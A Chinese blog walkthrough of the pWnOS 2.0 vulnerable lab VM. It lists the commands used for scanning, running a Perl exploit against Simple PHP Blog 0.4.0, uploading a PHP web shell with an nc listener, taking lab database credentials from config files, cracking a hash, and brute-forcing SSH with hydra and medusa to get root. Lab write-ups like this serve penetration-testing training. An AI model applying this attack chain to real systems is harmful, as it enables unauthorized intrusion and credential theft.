当前位置: 首页 > news >正文

pWnOS 2.0靶机渗透测试全攻略笔记

前置信息

特别注意,这个靶机的 ip 是固定的 10.10.10.100,我们需要将靶机设置为 NAT 模式,同时要将攻击机 kali 的 ip 也处于 10.10.10.0/24 这个网段,具体在菜单栏的编辑——虚拟网络编辑器,如下,点击更改设置,保证虚拟机的子网 ip 是 10.10.10.0 即可

常规信息收集

主机发现:sudo nmap -sn 10.10.10.0/24

端口发现:sudo nmap --min-rate 10000 -p- 10.10.10.100

UDP 端口:sudo nmap -sU --min-rate 10000 -p- 10.10.10.100

开放端口详细信息探测:sudo nmap -sT -sV -O -p 22,80 10.10.10.100

脚本扫描:sudo nmap --script=vuln -p 22,80 10.10.10.100

80 端口转向 web 渗透

目录爆破/FUZZ:dirb http://10.10.10.100

存在/blog/目录,访问发现是博客内容管理系统,右键查看源码获得类型和版本信息为 Simple PHP Blog 0.4.0

漏洞库里面查找该类型版本的 cve:searchsploit Simple PHP Blog 0.4.0

根据利用文件编号拿下利用文件:searchsploit Simple PHP Blog -m 1191

阅读利用文件根据说明进行利用:sudo perl 1191.pl -h http://10.10.10.100/blog -e 2

解决报错问题:sudo apt install libswitch-perl
漏洞利用:sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U wap3ku -P wap3ku

通过漏洞利用设置的账号密码登陆系统

登陆后 发现文件上传点

新建 shell.php 文件


本地监听:sudo nc -lvnp 1234


上传 shell.php 文件,通过遍历等手段获取上传文件的路径:http://10.10.10.100/blog/images/shell.php
浏览器直接访问木马文件, nc 上线

上线后的信息收集

执行:cd ../../
跳转到上上级目录发现配置文件: mysqli_connect.php

通过账密登陆数据库:mysql -uroot -pgoodday
访问被拒绝,由于程序能跑起来说明密码一定不会错

可能并没有使用该配置文件,找找其他目录是否存在类似文件:find / -name mysqli_connect.php 2>/dev/null

查看新文件

连接 msyql,报错(卡在连接界面不进去))

优化 shell,通过之前的信息收集可以得知存在 python 环境
python -c 'import pty;pty.spawn("/bin/bash")'

再次连接 mysql: mysql -uroot -proot@ISIntS

逐级查询

得到密文密码,进行爆破
首先查询加密类型:hash-identifier 'c2c4b4e51d9e23c02c15702c136c3e950ba9a4af'

解密:https://hashes.com/en/decrypt/hash(别的网站可能解不出来)

获取用户名加上之前暴露的和 mysql 中查到的账密和关键词作为字典进行碰撞ssh:
vim /etc/passwd

筛选出用户名

awk -F: '{print $1}' /etc/passwd
cut -d: -f 1 /etc/passwd

想要更加精简可以过滤掉系统内置虚拟用户,只输出可登录的普通用户

awk -F: '$7!~/nologin/ {print $1}' /etc/passwd

22 端口 ssh 登陆碰撞

通过上面获得的用户名和密码字典进行
password+keywords

username

hydra 九头蛇爆破(首推)
sudo hydra -L user.list -P passwd.list -s 22 ssh://10.10.10.100 -t 1 -vV -o hydra_result.txt

报错算法协商不匹配,改用 Medusa(不受系统 ssh 算法限制)
medusa -h 10.10.10.100 -M ssh -U user.list -P passwd.list -t 1 -q > medusa_result.txt

连接 ssh,拿下 root 权限

参考资源:「红队笔记」https://www.bilibili.com/video/BV1id4y1k7cf?vd_source=c42e9b8ccba6fa5b7e5c400cd333bee9

http://www.cnnetsun.cn/news/3767735.html

相关文章:

  • MDB Tools深度解析:跨平台Access数据库访问与转换架构剖析
  • 暗黑破坏神2角色编辑器:Diablo Edit2完全指南
  • 芯科 SI4463-C2A-GMR 兼容替代 国产 DP4363
  • 企业级数据治理自动化:OpenMetadata策略引擎终极指南
  • 基于SSM框架的野生动物救助系统设计与实现
  • Unity UI自适应布局:Canvas Scaler三种模式深度解析与实战避坑指南
  • C语言进制转换实战:从内存视角掌握底层编程核心技能
  • Proteus仿真核心指南:从器件检索到高效仿真的全流程解析
  • C++ Lambda表达式实现递归:原理、方案与实战指南
  • STM32 FreeRTOS CPU利用率统计:原理、实现与优化指南
  • 你的 SLO 已经告急;下面介绍如何在 Elastic Observability 中找出罪魁祸首
  • 76岁山东新首富拿下IPO,苏州资本热土还有多少企业排队上市?
  • 2026年应届生黑科技榜单9款AI论文平台亲测!
  • 通达信缠论插件完整指南:从理论到实战的智能分析工具
  • Rust异步运行时核心原理:手搓极简Async Runtime实现物理射线检测
  • 智能题库与语音处理技术在中考英语听力训练中的应用
  • AI 编程控制面:模型、MCP、地域和审计怎么一起管
  • 2026年7月流量测量装置怎么选?中国主流生产厂家综合测评指南
  • Windows安卓应用安装神器:告别模拟器,3分钟搞定APK安装
  • 多旋翼无人机组合导航系统与Matlab实现
  • 【单片机毕业设计】基于光敏红外传感器的室内节能灯光控制系统 基于嵌入式单片机的环境光照灯光档位调控系统(014901)
  • 遥感解译核心:地物发射与反射辐射特征原理与应用
  • 单片机毕设项目:基于 STM32 的指纹考勤打卡系统设计与实现 基于 ESP-01S 的物联网指纹考勤终端开发(015001)
  • FreeMove终极指南:3步解决C盘空间不足,智能迁移文件夹不破坏程序运行
  • 终极免费数据恢复指南:如何用TestDisk和PhotoRec找回丢失的数据
  • 终极指南:5分钟掌握微信公众号爬虫,轻松获取文章数据与互动指标
  • 游戏开发中的镜像效果与动画同步技术实现
  • AI搜索时代:结构化问答内容优化策略
  • 偏远取水站点改造方案,开关量无线传输模块规避线缆铺设难题,保障取水站稳定监测预警
  • 把生产环境脏数据喂给AI,它反手生成了把全表清空的“清洗脚本“